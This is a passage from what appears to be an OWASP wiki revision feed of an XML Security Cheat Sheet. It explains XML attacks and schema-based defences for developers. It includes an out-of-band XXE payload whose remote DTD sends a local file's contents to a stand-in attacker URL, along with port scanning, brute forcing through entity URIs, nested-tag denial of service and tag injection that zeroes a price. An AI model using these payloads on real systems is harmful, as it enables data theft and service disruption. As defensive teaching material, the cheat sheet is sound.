&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224426</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224426"/>
				<updated>2016-12-21T20:13:17Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
